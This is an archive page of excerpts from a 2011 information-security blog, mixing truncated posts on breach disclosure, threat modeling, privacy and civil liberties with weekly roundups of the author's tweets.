On Saturday, I discussed how “I bolluxed our blog theme.” “More to the point, we here at the New School talk a good game about how we need to talk about problems, rather than cover them up. So here’s our money where our mouths are. I, Adam Shostack, screwed up the blog presentation by not […]

 

Twitter Weekly Updates for 2011-12-18

RT @jeremiahg "HBGary not only didnt lose biz customers in the past year, but "got additional business" -Hoglund http://t.co/ap9pP39F # RT @bobblakley @Judgenap "Timid men prefer the calm of despotism to the tempestuous sea of liberty." Thomas Jefferson # Weekend blog "Threat Modeling & Risk Assessment" follows up on conversation with @451wendy http://t.co/iFCRCJW3 # RT […]

 

APT didn’t eat our theme. Adam did.

If you read this blog with a web-reader, you’ll note our (ahem) excellent new theme, and may be saying, wow, guys, “nice job” Yeah. Ooops. I upgraded to WordPress 3.3, and upgraded our theme, and in so doing, overwrote some of the CSS that Alex had tweaked. I didn’t test, and so things were wonky. […]

 

ThreatPost Podcast with Adam Shostack

Last week I did a podcast with Dennis Fisher. In it, we touched on what I might change in the book. Take a listen at: “Adam Shostack on Methods of Compromise, the New School and Learning“

 

Outrage of the Day: DHS Takes Blog Offline for a year

Imagine if the US government, with no notice or warning, raided a small but popular magazine’s offices over a Thanksgiving weekend, seized the company’s printing presses, and told the world that the magazine was a criminal enterprise with a giant banner on their building. Then imagine that it never arrested anyone, never let a trial […]

 

The output of a threat modeling session, or the creature from the bug lagoon

Wendy Nather has continued the twitter conversation which is now a set of blog posts. (My comments are threat modeling and risk assessment, and hers: “That’s not a bug, it’s a creature. “) I think we agree on most things, but I sense a little semantic disconnect in some things that he says: The only […]

 

Top 5 Security Influencers of 2011

I really like Gunnar Peterson’s post on “Top 5 Security Influencers:” It’s December and so it’s the season for lists. Here is my list of Top 5 Security Influencers, this is the list with the people who have the biggest (good and/or bad) influence on your company and user’s security: My list is slightly different: […]

 

"Can copyright help privacy?"

There are semi-regular suggestions to allow people to copyright facts about themselves as a way to fix privacy problems. At Prawfsblog, Brooklyn Law School Associate Professor Derek Bambauer responds in “Copyright and your face.” Key quote: One proposal raised was to provide people with copyright in their faceprints or facial features. This idea has two […]

 

Twitter Weekly Updates for 2011-12-11

RT @daveaitel Tests Show Most Store Honey Isn't Honey http://t.co/2oI3O6RK << Will anyone go to jail for fraud? # RT @jdp23 Look at the list of the FTC complaints — huge issues. And basically no consequences to FB. So why should they change? #privchat # RT @threatpost $56 Billion Later and Airport #Security Is Still […]

 

Threat Modeling and Risk Assessment

Yesterday, I got into a bit of a back and forth with Wendy Nather on threat modeling and the role of risk management, and I wanted to respond more fully. So first, what was said: (Wendy) As much as I love Elevation of Privilege, I don’t think any threat modeling is complete without considering probability […]

 

Outrage of the Day: Police Violence

When the LAPD finally began arresting those of us interlocked around the symbolic tent, we were all ordered by the LAPD to unlink from each other (in order to facilitate the arrests). Each seated, nonviolent protester beside me who refused to cooperate by unlinking his arms had the following done to him: an LAPD officer […]

 

Particularly NewSchool Job Posting

From Keith Weinbaum, Director of Information Security of Quicken Loans Inc. https://www.quickenloanscareers.com/web/ApplyNow.aspx?ReqID=53545 From the job posting: WARNING:  If you believe in implementing security only for the sake of security or only for the sake of checking a box, then this is not the job for you.  ALSO, if your primary method of justifying security solutions […]

 

Podtrac.com and Listener Privacy

It turns out that it’s very hard to subscribe to many podcasts without talking to Podtrac.com servers. (Technical details in the full post, below.) So I took a look at their privacy statement: Podtrac provides free services to podcasters whereby Podtrac gathers data specific to individual podcasts (e.g. audience survey data, content ratings, measurement data, […]

 
 

Twitter Weekly Updates for 2011-12-04

New School blog "'Its Time to Learn Like Experts' by @jayjacobs" http://t.co/lnXTqyp8 # RT @dmolnar Help me shop for furniture http://t.co/rXxLrB4O # RT @moxie__ WhisperSystems has been acquired! http://t.co/M5i1g6D0 < Congratulations! I hope it leads to great things for Twitter privacy # RT @tsastatus A few new features, and a bunch of status updates, at […]

 

Gävle Goat Gambit Goes Astray

It’s a bit of a Christmas tradition here at Emergent Chaos to keep you informed about the Gävle Goat. Ok, technically, our traditions seem hit and miss, but whaddaya want from a site with Chaos in the name? You want precision, read a project management blog. Project management blogs probably set calendar reminders to kick […]

 

Paper: "The Future of Work is Play"

My colleague Ross Smith has just presented an important new paper, “The Future of Work is Play” at the IEEE International Games Innovation Conference. There’s a couple of very useful lessons in this paper. One is the title, and the mega-trends driving games into the workplace. Another is Ross’s lessons of when games work: Over […]

 

Big Brother Watch report on breaches

Over at the Office of Inadequate Security, Dissent says everything you need to know about a new report from the UK’s Big Brother Watch: Extrapolating from what we have seen in this country, what the ICO learns about is clearly only the tip of the iceberg there. I view the numbers in the BBW report […]

 

We Robot: The Conference

This looks like it has the potential to be a very interesting event: The University of Miami School of Law seeks submissions for “We Robot” – an inaugural conference on legal and policy issues relating to robotics to be held in Coral Gables, Florida on April 21 & 22, 2012. We invite contributions by academics, […]

 

Telephones and privacy

Three stories, related by the telephone, and their impact on privacy: CNN reports that your cell phone is being tracked in malls: Starting on Black Friday and running through New Year’s Day, two U.S. malls — Promenade Temecula in southern California and Short Pump Town Center in Richmond, Va. — will track guests’ movements by […]

 

"It's Time to Learn Like Experts" by Jay Jacobs

I want to call attention to a new, important and short article by Jay Jacobs. This article is a call to action to break the reliance on unvalidated expert opinions by raising awareness of our decision environment and the development of context-specific feedback loops. Everyone in the New School is a fan of feedback loops […]

 

Twitter Weekly Updates for 2011-11-27

MT @attractr Bejtlich: SEC Guidance Emphasizes Materiality for disclosing sec incidents: "new audience: shareholders" http://t.co/mlMts2Wd # RT @doctorow Just got to Occupy New School http://t.co/VjfVhFcN << I think Cory means something other than I would mean by this statement 🙂 # NYTimes reports man bites dog, I mean "Screening Still a Pain at Airports, Fliers […]

 

Relentless navel gazing, part MCXII

Two changes here at Emergent Chaos this weekend: first, a new, variable width theme which is a little tighter, so there’s more on a screen. Second, I’ve moved the twitter summary to weekly, as comments were running about 50-50 on the post asking for opinion. I think that may be a better balance. And a […]

 

The One Where David Lacey's Article On Risk Makes Us All Stupider

In possibly the worst article on risk assessment I’ve seen in a while, David Lacey of Computerworld gives us the “Six Myth’s Of Risk Assessment.” This article is so patently bad, so heinously wrong, that it stuck in my craw enough to write this blog post. So let’s discuss why Mr. Lacey has no clue […]

 

What's Wrong and What To Do About It?

Let me start with an extended quote from “Why I Feel Bad for the Pepper-Spraying Policeman, Lt. John Pike“: They are described in one July 2011 paper by sociologist Patrick Gillham called, “Securitizing America.” During the 1960s, police used what was called “escalated force” to stop protesters. “Police sought to maintain law and order often […]

 

Twitter Updates from Adam, 2011-11-25

RT @marciahofmann Carrier IQ backpedals on bogus legal threat, apologizes to security researcher. http://t.co/yY5o6JJk < Nice work Marcia! # Powered by Twitter Tools

 

Twitter Updates from Adam, 2011-11-24

RT @risktical #riskhose podcast, Episode 14 http://t.co/5hF9YKlZ @adamshostack & 'feedback loops' – great content! @jayjacobs @alexhutton # New "blog" points to Risk Hose podcast #14 with me, @alexhutton, @risktical @jayjacobs http://t.co/8zaBLD8x # RT @CYBERLAWRADIO About to go live on CLBR with CMU Prof @lorrietweet on Why Johnny Can't Opt Out – on webmasterradio.fm # RT […]

 

Risk Hose Podcast #14 with Adam and Alex

I’m on episode 14 of the Risk Hose podcast, with co-blogger Alex. Chris, Jay and Alex are joined by Adam Shostack and we dig into the topic of feedback loops within Information Security. You should check it out! Episode 14: Feedback Loops

 

Twitter Updates from Adam, 2011-11-23

NYTimes reports man bites dog, I mean "Screening Still a Pain at Airports, Fliers Say" http://t.co/vlPAH1n0 # New School blog post, "AT&T Hack Attempt" I'm looking for polling software http://t.co/d4YooBv9 # I missed a great opportunity in a recent podcast to say "controls implemented in a way that makes both auditors & attackers happy" # […]

 

AT&T Hack Attempt

First, good on AT&T for telling people that there’s been an attempt to hack their account. (My copy of the letter that was sent is after the break.) I’m curious what we can learn by discussing the attack. An AT&T spokesperson told Fox News that “Fewer than 1 percent of customers were targeted.” I’m currently […]

 

Twitter Updates from Adam, 2011-11-22

RT @doctorow Just got to Occupy New School http://t.co/VjfVhFcN << I think Cory means something other than I would mean by this statement 🙂 # Powered by Twitter Tools

 

Twitter Updates from Adam, 2011-11-21

MT @attractr Bejtlich: SEC Guidance Emphasizes Materiality for disclosing sec incidents: "new audience: shareholders" http://t.co/mlMts2Wd # Powered by Twitter Tools

 

Twitter Updates from Adam, 2011-11-20

New School blog post "Privacy is Security, Part LXII: The Steakhouse" http://t.co/cEjWix7N # MT @_nomap More on [obvious] Saudi airport fingerprint fail. It was mostly immigrant workers stranded for 12 hours. http://t.co/g3ih69Sk # MT @dgwbirch Heard on BBC that poor people use cash, end up paying up to £185 per annum more for utilities << […]

 

Privacy is Security, Part LXII: The Steakhouse

But in the last year and a half, at least 50 diners at restaurants like the Capital Grille, Smith & Wollensky, JoJo and Wolfgang’s Steakhouse ended up paying for more than just a fine piece of meat. Their card information — and, in effect, their identities [sic] — had been stolen by waiters in a […]

 

Twitter Updates from Adam, 2011-11-19

RT @alexhutton @adamshostack @bobblakley @threatpost I thought blogging was dead? << apparently! # RT @dostlund: NYPD has sidewalk checkpoints requiring ID to pass down Broadway. Iranian-born co-worker said "they used to do that in Tehran" # New Blog: Emergent Chaos endorses @wimremes for ISC(2) Board http://t.co/oAWTljcC # This post by Steve Bellovin reminded me of […]

 
 

Emergent Chaos endorses Wim Remes for ISC(2) Board

Today, we are sticking our noses in a place about which we know fairly little: the ISC(2) elections. We’re endorsing a guy we don’t know, Wim Remes, to shake stuff up. Because, really, we ought to care about the biggest and oldest certification in security, but hey, we don’t. And really, that’s a bit of […]

 

Twitter Updates from Adam, 2011-11-18

MT @ashk4n Most [Android?] Phones Ship w/ CarrierIQ "Rootkit" that allows carrier to keylog & record browser history http://t.co/90vYRCHR # MT @bobblakley @threatpost Orgs that ban social networks on company PCs ++more likely to be hacked http://t.co/z7oy4rYF http://t.co/9iIb4BBg # New School blog, "Block Social Media, Get Pwned" http://t.co/dWzuCyzz quick comments on @TELUSBusiness report. (Thanks @bobblakley!) […]

 

Block Social Media, Get Pwned

At least, that’s the conclusion of a study from Telus and Rotman. (You might need this link instead) A report in IT security issued jointly by Telus and the Rotman School of Management surveyed 649 firms and found companies that ban employees from using social media suffer 30 percent more computer security breaches than ones […]

 

Twitter Updates from Adam, 2011-11-17

RT @timoreilly TSA Puts Off Safety Study of X-ray Body Scanners http://t.co/GO4uHLN0 Meanwhile, Europe has banned them http://t.co/rmK3ZSTc # Powered by Twitter Tools

 

And there may be many others but they haven't been discovered

Three newly discovered elements were given names on Friday by the General Assembly of the International Union of Pure and Applied Physics at a meeting in London. They are Darmstadtium, or Ds, which has 110 protons in its nucleus and was named after the town in which it was discovered; Roentgenium, or Rg, with 111 […]

 

Twitter Updates from Adam, 2011-11-16

New School blog post "Breach disclosure and Moxie’s Convergence" http://t.co/mu5iLU2n (cc @moxie__ ) # New School blog post "Breach disclosure and Moxie’s Convergence" http://t.co/mu5iLU2n # Powered by Twitter Tools

 

Breach disclosure and Moxie's Convergence

Two weeks ago I finally got a chance to see Moxie’s Convergence/Trust Agility talk in person. (Since this was at work, let me just re-iterate that this blog is my personal opinions about what I saw.) It’s very good stuff, and Moxie and I had a good side chat about enhancing the usability of Convergence […]

 

Twitter Updates from Adam, 2011-11-15

RT @exiledsurfer @KforKallisti: Dan Siegel, Mayor Jean Quan's legal adviser quits over #OccupyOakland police raid http://t.co/c5brsq5u #ows # MT @mikko Somebody forgot a vacuum cleaner in a Swedish nuke plant, causing $267M in damages: http://t.co/kLRbV90h << someone tell stuxnet! # RT @dgwbirch was it a Freeman Dyson? (retires to cheers for making first ever physicist/vacuum […]

 

Twitter Updates from Adam, 2011-11-14

RT @WC2A_2AE Indian Communist Party General Sectry 'Let's fingerprint all Americans entering the country, like Brazil' http://t.co/GRBoQfYC # Powered by Twitter Tools

 

Twitter Updates from Adam, 2011-11-12

Nice of Apple to fix CVE-2011-0997, published in April (http://t.co/kOh6kTvs) # RT @jeremiahg "Steam Web sites hacked, gamer data exposed" http://t.co/daqkExWj < anyone see an attack vector? << Probably social eng 🙂 # RT @josephmenn @daveweigel The winner. RT @KagroX: Why didn't we just make 10/10/10 louder? # RT @WC2A_2AE Anyone interested in border security […]

 

Twitter Tools? Feedback please

So about a month ago, I started flowing my tweets over here. I’d love your thoughts on if it’s helpful, hurtful, or you just ignore it in your reader. [Update: currently arguments run 3:2 against continuing Twitter in the main feed. More (and civil) debate is invited.]

 

Twitter Updates from Adam, 2011-11-11

MT @normative How Far Will the Government Go in Collecting and Storing Data about us? New FBI Documents Shed Light http://t.co/zylCo3ES # RT @tqbf If the infosec community was a real influencer in crypto, we'd all be using Twofish instead of AES because of http://t.co/e21kDcwM # .@tqbf has the crypto or vuln community given us […]

 

Twitter Updates from Adam, 2011-11-10

MT @samablog More States Accept [fail to arrest?] TSA VIPR Teams at Transportation Hubs http://t.co/h3wdaQ3N via @zite # Are others seeing ICMP timeouts for http://t.co/y2uU0Qvt? /cc @moxie__ # RT @arj: @chenxiwang busts out her dog-eared copy of the Orange Book … < I've never seen a dog-eared copy of the Orange Book! # RT @dakami […]

 

Twitter Updates from Adam, 2011-11-09

RT @Fiona: Go watch The Muppets hang out on Google+. Me: Thank you: http://t.co/HacZWzBA << Is "Cookie Monster" an approved name? # RT @Jim_Harper When I describe @Cato's argument–"reasonable expectation of #privacy" FAIL–lawyers steeped in doctrine get confused. #Jones # New blog: "Slow thoughts on Occupy Seattle" http://t.co/13RTo5NE # RT @csoghoian Jones oral argument […]

 

Slow Thoughts on Occupy Seattle

I headed down to Occupy Seattle before a recent vacation, and have been mulling a bit on what I saw, because the lack of a coherent message or leadership or press make it easy to project our own opinions or simply misunderstand what the “Occupy” protests mean, and I wanted to avoid making that mistake. […]

 

Twitter Updates from Adam, 2011-11-08

New blog: "Thoughts on the 2011 DBIR and APT (Authorization Preservation Threats)" http://t.co/yXdAPMqv # New School blog: "Thoughts on the 2011 DBIR and APT (Authorization Preservation Threats)" http://t.co/yXdAPMqv # Powered by Twitter Tools

 

Thoughts on the 2011 DBIR and APT (Authorization Preservation Threats)

So Verizon has recently released their 2011 DBIR. Or perhaps more accurately, I’ve managed to pop enough documents off my stack that my scribbled-on notes are at the top, and I wanted to share some with you. A lot have gone to the authors, in the spirit of questions only they can answer. Here, I […]

 

Twitter Updates from Adam, 2011-11-07

RT @moxie__ Sarah's reflections on solitary confinement: http://t.co/z46aZjgM # RT @marcan42 RSA keys generated by Ruby didn't actually encrypt anything (e=1). "Oops". http://t.co/9vYNFVlI << I Ruby-encrypted this tweet # RT @ioerror We demand a vapid, condescending, meaningless, politically safe response to this petition: http://t.co/ndtf8tI4 # RT @bratling @mrkoot @adamshostack @ioerror Broken URL, not site. Here's […]

 

Twitter Updates from Adam, 2011-11-06

RT @k8em0 Thanks to speakers, attendees, organizers & volunteers for a fantastic & memorable #bluehat ! # RT @bengoldacre I'm leaving journalism for 6 months. Here's what I've learnt from writing about nonsense for 8 years http://t.co/GZlDnQ18 # RT @AdasBooks Book signing with @johncsh tomorrow at 1pm! http://t.co/pHqhbTv3 # RT @normative Profoundly depressed this is […]

 

Twitter Updates from Adam, 2011-11-05

RT @StephieShaver They say there's no rest for the wicked but at least there's espresso! FridayWHAT? << friday at BlueHat! # RT @Beaker: Congrats to @mortman on joining @enstratus! First @jamesurquhart then @botchagalupe and now Dave! All good friends together # As I watch @moxie__ give his trust talk at BlueHat, I realize how valuable […]

 

Twitter Updates from Adam, 2011-11-04

RT @at1as: Instead of useless Presidential Debates, how about a #wargame where we get to see how candidates respond to crisis situations? # RT @wikidsystems @adamshostack @at1as Kobayashi Maru! << Cyberyashi Maru! # Getting ready to give my #BlueHat talk on "How Computers Are Compromised." # Oooh, @jeremiahg wants us to play a game at […]

 

Twitter Updates from Adam, 2011-11-03

MT @samablog TSA Ignored Cancer Risks from TSA Scanners http://t.co/r72RAw2d via @zite # RT @k8em0 This year's #bluehat should be exciting, check out the lineup – http://t.co/Ee1LoHVK # RT @k8em0 #bluehat is on! Andrew Cushman reflects on past and future threats. http://t.co/w0GpjTQC # What do the comments from ISS World(http://t.co/51Z5ULNQ) mean for surveillance law in […]

 

Twitter Updates from Adam, 2011-11-02

RT @ioerror IEEE Global Humanitarian Technology Conference in Seattle http://t.co/VefGa4yy < Looks very exciting, wish I'd known sooner # Follow @ioerror for reporting of Patrick Ball, @alexvans for London Cyber-security event # New blog because my main email is down: "Email chaos: How to reach Adam Shostack" http://t.co/to9lKHKK # RT @GamingPrivacy reflecting on game design […]

 

Email chaos: How to reach Adam Shostack

The servers that host my personal email have been taken offline by a surprise attack by the evil forces of snow and ice, and my email is likely to start bouncing soon. If you need to reach me, you can use nameofthisblog @ google, or first.last @ microsoft. You can also ask me to follow […]

 

Twitter Updates from Adam, 2011-11-01

Short blog: "McWrap Chevre" http://t.co/K1LkXnFU # RT @lorrietweet Why Johnny Can’t Opt Out: A Usability Evaluation of Tools to Limit Online Behavioral Advertising http://t.co/5DDWfhVd # My personal email server is down because of the snow on the east coast. # RT @STRATFOR If #Anonymous does #OpCartel it will almost certainly lead to deaths for members: […]

 

EFF on HTTPS

The Electronic Frontier Foundation has published a report on the State of HTTPS Security that promises to be the first in a series and is well worth reading on its own. The TL;DR version:  HTTPS adoption is growing rapidly, but the current system, especially the Certificate Authorities, has much room for improvement before it actually […]

 

McWrap Chevre

Normally, I like the overlap of cultures, the boundaries of exploration and what comes from that exploration. But this three-way Frankenstein’s combination of French cheese, wraps (not sure where to attribute those–I think the US version is mostly from burritos, but there’s also Arabic pita wraps) and American is somehow best posted on Halloween:

 

Twitter Updates from Adam, 2011-10-31

RT @alexhutton Seriously? DHS doesn't *do* threat modeling? My rage is like a 1000 TSA exposed to cancer causing back scatter devices. # RT @ACLU FBI issued 143,074 National Security Letters '03-05 & reported 0 terrorism prosecutions as a result. Zilch. http://t.co/JM8FBFyf # RT @EthanZ Background on @alaa's detention for refusal to accept legitimacy of […]

 

Twitter Updates from Adam, 2011-10-30

"Plankytronixx" has a nice blog post on Elevation of Privilege at http://t.co/CFFrWAfF # RT @mattblaze Attention NYPD sign makers: "Just following orders" is not a great slogan. http://t.co/LHBOvQ8f # I'd missed @BillBrenner70 on Security Horror Show http://t.co/5nS0KHOH What can we do to stop the madness? # RT @AudryT Police confirmed: Pepper spray & rubber bullets […]

 
 

Twitter Updates from Adam, 2011-10-28

RT @dgwbirch I'm sure talks will be fun, but am looking forward to playing the new version of "Privacy" the card game http://t.co/PZGcFf9l # I accidentally clicked allow Firefox to share my location. Where the hell is the undo and why isn't it in privacy preferences? # ("Location" doesn't bring up anything in help) # […]

 

Twitter Updates from Adam, 2011-10-27

RT @PogoWasRight Congressman: Secret Report On #TSA Pat Downs, Body Scanner Failures Will “Knock Your Socks Off” http://t.co/pjFmd0Zz # RT @peterhoneyman i fly DTW where they are testing chat down. i opt out and clam up. they get all dour and nasty. # RT @e3i5: Every picture ULed to Facebook is examined for possible matches […]

 

Twitter Updates from Adam, 2011-10-26

RT @georgevhulme RT @msksecurity: The Dark Side Of Biometrics: 9 Million Israelis' Hacked Info Hits The Web http://t.co/817TMklU # Actually, @danphilpott, the best line is "Crews determined the land mines were benign and removed them from the bag." http://t.co/KobPO94k # RT @k8em0 This year's #bluehat should be exciting, check out the lineup – http://t.co/Ee1LoHVK # […]

 

DLNA Servers for the Mac

Very short version: Finding a DLNA player that supported the Mac and my new Oppo player was time consuming. Twonky is ok, but I would like something prettier, more reliable, and reasonably secure. I wanted to blog my experience in case it helps other folks. Also, as I posted this, I came across Ed Bott’s […]

 

Twitter Updates from Adam, 2011-10-25

New School blog: "Maria Klawe on increasing Women in Technology" http://t.co/NDugVafW # RT @Jim_Harper How Much Homeland Security is Enough? Live now at: http://t.co/XtUXmzp1 << Right question is "how much is too much?" 🙂 # RT @TheOnion American Voices: Should bikers have to register their trips with the government? Tell us #whatdoyouthink http://t.co/1NbLi5Rb # RT […]

 

Maria Klawe on increasing Women in Technology

I talk a lot about the importance of data in enabling us to bring the scientific method to bear on information security. There’s a reason for that: more data will let us know the falsehoods, and knowing the falsehoods will set us free. But discovering what claims don’t stand up to scrutiny is a matter […]

 

Some Thoughts on Binary Risk Assessment

Ben Sapiro showed off his Binary Risk Assessment (BRA) at SecTor recently. While I didn’t see the presentation, I’ve taken some time and reviewed the slides and read through the documentation. I thought I’d quickly give my thoughts on this: It’s awesome and it sucks. IT’S AWESOME That’s not damning with faint praise, rather, it’s […]

 
 

Sleepless in Seattle?

Reportedly, Seattle police have begun issuing tickets to drivers who honk their horns after 10 PM in support of the Occupy protest there. To the extent that the police are only doing this to those expressing a specific point of view, there seems to be a legitimate issue. I am certain that the police would […]

 

CIA Reveals Identity of Bin Laden Hunter

In the Atlantic Wire, Uri Friedman writes “Did the CIA Do Enough to Protect Bin Laden’s Hunter?” The angle Friedman chose quickly turns to outrage that John Young of Cryptome, paying close attention, was able to figure out from public statements made by the CIA, what the fellow looks like. After you’re done being outraged, […]

 

Twitter Updates from Adam, 2011-10-09

RT @stuxnet420 #twitter oh, yeah, it's on now. I'll see your Stuxnet and raise u a predator with an irc server. 🙂 http://t.co/hKpfDMBt # RT @drunkenpredator Phew. Think I kicked that software virus. Was really messing with my DEAR SIR I HAVE FOR YOU LUCRATIVE PROPOSAL # RT @runasand The CCC has reverse engineered, analyzed […]

 

Some random cloudy thinking

Thanks to the announcement of Apple’s iCloud, I’ve been forced to answer several inquiries about The Cloud this week. Now, I’m coming out of hiding to subject all of you to some of it… The thing that you must never forget about The Cloud is that once information moves to The Cloud, you’ve inherently ceded […]

 

Twitter Updates from Adam, 2011-10-08

RT @ethicalhack3r @floatingatoll: The UNIX time zone database has been destroyed by its authors due to a legal threat. http://t.co/1zQIKZm8 # RT @radleybalko Unreal. CA appeals court upholds warrantless cell phone searches during traffic stops. http://t.co/KnklNSat # If you haven't seen it, @ErrataRob "Independent reporting of #OccupyWallStreet" http://t.co/qDYxPdFx is a long thoughtful engagement # […]

 

Twitter updates

I’ve decided to experiment with pushing my Twitter feed onto the blog. What do you think? For non-Twitter users, the RT means “re-tweet,” amplifying things that others have said and MT means modified tweet, where the RT plus comment don’t quite fit. If someone has php code to resolve t.co URLs into real URLs, that […]

 

Twitter Updates from Adam, 2011-10-07

Sad to say I can find nothing to say beyond thanks, Steve. # Hey @beaker, if you support http://t.co/ObdJFd79 they have Squirrel t-shirts! # I think that @asteingruebl raises some really good questions in http://t.co/nnbdDNBe # Eric Rachner continues to need to sue for accountability from Seattle police & their videos http://t.co/S3fHkcSM # RT @jilliancyork […]

 

Nothing to add

(I saw this here, would appreciate the right attribution.)

 

New School of Information Security Book Reading at Ada's

Last Sunday, I did a book reading at Ada’s Technical Books. As I say in the video, I was excited because while I’ve talked about the New School, and I’ve given talks about the New School, I hadn’t done a book reading, in part because of the nature of the book, and my personal comfort […]

 
 

The Diginotar Tautology Club

I often say that breaches don’t drive companies out of business. Some people are asking me to eat crow because Vasco is closing its subsidiary Diginotar after the subsidiary was severely breached, failed to notify their reliant parties, misled people when they did, and then allowed perhaps hundreds of thousands of people to fall victim […]

 

Book Reading in Seattle on Sunday

This Sunday I’ll be reading from the New School at 4PM on Sunday at Ada’s Technical Books in Capitol Hill. If you’re in the area, you should come!

 

Lean Startups & the New School

On Friday, I watched Eric Ries talk about his new Lean Startup book, and wanted to talk about how it might relate to security. Ries conceives of startups as businesses operating under conditions of high uncertainty, which includes things you might not think of as startups. In fact, he thinks that startups are everywhere, even […]

 

Emergent Effects of Restrictions on Teenage Drivers

For more than a decade, California and other states have kept their newest teen drivers on a tight leash, restricting the hours when they can get behind the wheel and whom they can bring along as passengers. Public officials were confident that their get-tough policies were saving lives. Now, though, a nationwide analysis of crash […]

 

Diginotar Quantitative Analysis ("Black Tulip")

Following the Diginotar breach, FOX-IT has released analysis and a nifty video showing OCSP requests. As a result, lots of people are quoting a number of “300,000”. Cem Paya has a good analysis of what the OCSP numbers mean, what biases might be introduced at “DigiNotar: surveying the damage with OCSP.” To their credit, FoxIt […]

 

The Rules of Breach Disclosure

There’s an interesting article over at CIO Insight: The disclosure of an email-only data theft may have changed the rules of the game forever. A number of substantial companies may have inadvertently taken legislating out of the hands of the federal and state governments. New industry pressure will be applied going forward for the loss […]

 

California gets a strengthened Breach Notification Law

Governor Brown of California has signed a strengthened breach notification bill, which amends Sections 1798.29 and 1798.82 of the California Civil Code in important ways. Previous versions had been repeatedly vetoed by Arnold Schwarzenegger. As described[.DOC] by its sponsor’s office, this law: Establishes standard, core content — such as the type of information breached, time […]

 

Best autoresponse message

As Brad Feld says, this is the best auto-responder in a long time: I am currently out of the office on vacation. I know I’m supposed to say that I’ll have limited access to email and won’t be able to respond until I return — but that’s not true. My blackberry will be with me […]

 

15 Years of Software Security: Looking Back and Looking Forward

Fifteen years ago, I posted a copy of “Source Code Review Guidelines” to the web. I’d created them for a large bank, because at the time, there was no single document on writing or reviewing for security that was broadly available. (This was about four years before Michael Howard and Dave LeBlanc published Writing […]

 

Change.

I’ve left Verizon. A lot of folks have come up to me and asked, so I thought I’d indulge in a rather self-important blog-post and explain something: It wasn’t about Verizon, but about the opportunity I’ve taken. Wade, Chris, Hylender, Marc, Joe, Dave, Dr. Tippett & all the rest – they were all really, really […]

 

Nymwars: Thoughts on Google+

There’s something important happening around Google+. It’s the start of a rebellion against the idea of “government authorized names.” (A lot of folks foolishly allow the other side to name this as “real names,” but a real name is a name someone calls you.) Let’s start with “Why Facebook and Google’s Concept of ‘Real Names’ […]

 

Securosis goes New School

The fine folks at Securosis are starting a blog series on “Fact-based Network Security: Metrics and the Pursuit of Prioritization“, starting in a couple of weeks. Sounds pretty New School to me! I suggest that you all check it out and participate in the dialog. Should be interesting and thought provoking. [Edit — fixed my […]

 

Tap Tap Snarky

From the app store: I hope this doesn’t cause Apple to ban snarky update messages.

 

Worst.Technology.Application.Ever. (?)

It’s occurring to me this morning that in terms of benefit/cost, purely in “damage to society” terms, the decision to put html in emails could be one of the worst ideas in the past 25 years. But that’s just me. Your thoughts on others in the comments?

 

Emergent Map: Streets of the US

This is really cool. All Streets is a map of the United States made of nothing but roads. A surprisingly accurate map of the country emerges from the chaos of our roads: All Streets consists of 240 million individual road segments. No other features — no outlines, cities, or types of terrain — are marked, […]

 

Is iTunes 10.3.1 a security update?

Dear Apple, In the software update, you tell us that we should see http://support.apple.com/kb/HT1222 for the security content of this update: However, on visiting http://support.apple.com/kb/HT1222, and searching for “10.3”, the phrase doesn’t appear. Does that imply that there’s no security content? Does it mean there is security content but you’re not telling us about it? […]

 

Thoughts on this Independence Day

Emergent Chaos has a long tradition of posting the American Declaration of Independence here to celebrate the holiday. It’s a good document in many ways. It’s still moving, more than two centuries after it was written. It’s clearly written, and many people can learn from its structured approach to presenting a case. And last but […]

 

MySpace sells for $35 Million, Facebook to follow

So MySpace sold for $35 million, which is nice for a startup, and pretty poor for a company on which Rupert Murdoch spent a billion dollars. I think this is the way of centralized social network software. The best of them learn from their predecessors, but inevitably end up overcrowded. Social spaces change. You don’t […]

 

Breach Harm: Should Arizona be required to notify?

Over at the Office of Inadequate Security, Pogo was writing about the Lulzsec hacking of Arizona State Police. Her article is “A breach that crosses the line?” I’ve been blogging for years about the dangers of breaches. I am concerned about dissidents who might be jailed or killed for their political views, abortion doctors whose […]

 

Goodbye, Rinderpest, we're probably better off without you

On Tuesday in a ceremony in Rome, the United Nations is officially declaring that for only the second time in history, a disease has been wiped off the face of the earth. The disease is rinderpest. Everyone has heard of smallpox. Very few have heard of the runner-up. That’s because rinderpest is an epizootic, an […]

 

Sex, Lies & Cybercrime Surveys: Getting to Action

My colleagues Dinei Florencio and Cormac Herley have a new paper out, “Sex, Lies and Cyber-crime Surveys.” Our assessment of the quality of cyber-crime surveys is harsh: they are so compromised and biased that no faith whatever can be placed in their findings. We are not alone in this judgement. Most research teams who have […]

 

Communicating with Executives for more than Lulz

On Friday, I ranted a bit about “Are Lulz our best practice?” The biggest pushback I heard was that management doesn’t listen, or doesn’t make decisions in the best interests of the company. I think there’s a lot going on there, and want to unpack it. First, a quick model of getting executives to do […]

 

Are Lulz our best practice?

Over at Risky.biz, Patrick Grey has an entertaining and thought-provoking article, “Why we secretly love LulzSec:” LulzSec is running around pummelling some of the world’s most powerful organisations into the ground… for laughs! For lulz! For shits and giggles! Surely that tells you what you need to know about computer security: there isn’t any. And […]

 

How the Epsilon Breach Hurts Consumers

Yesterday, Epsilon and Sony testified before Congress about their recent security troubles. There was a predictable hue and cry that the Epsilon breach didn’t really hurt anyone, and there was no reason for them to have to disclose it. Much of that came from otherwise respectable security experts. Before I go on, let me give […]

 

ThreatPost goes New School

In “It’s Time to Start Sharing Attack Details,” Dennis Fisher says: With not even half of the year gone, 2011 is becoming perhaps the ugliest year on record for major attacks, breaches and incidents. Lockheed Martin, one of the larger suppliers of technology and weapons systems to the federal government, has become the latest high-profile […]

 

Map of Where Tourists Take Pictures

Eric Fischer is doing work on comparing locals and tourists and where they photograph based on big Flickr data. It’s fascinating to try to identify cities from the thumbnails in his “Locals and Tourists” set. (I admit, I got very few right, either from “one at a time” or by looking for cities I know.) […]

 

The Future of Education is Chaotic, Fun and Unevenly Distributed

After I wrote “The future of education is chaotic and fun“, I came across “The Montessori Mafia” about the unusual levels of success that Montessori produces. In my post, I opened discussing how our current system of funding education in the US is to force everything through a government department. That department is constrained by […]

 

The Flying Spaghetti Monster

In honor of rapture day, the Flying Spaghetti Monster has chosen to manifest his tentacly goodness in Stanley Park in Vancouver:

 

Elevation of Privilege news

I wanted to let people know that Microsoft is making the source files for the Elevation of Privilege game available. They are Adobe Illustrator and InDesign files, and are now on the EoP download site. They’re 85 MB of zipped goodness. They can be used under the same Creative Commons Attribution 3.0 US license under […]

 

"Pirate my books, please"

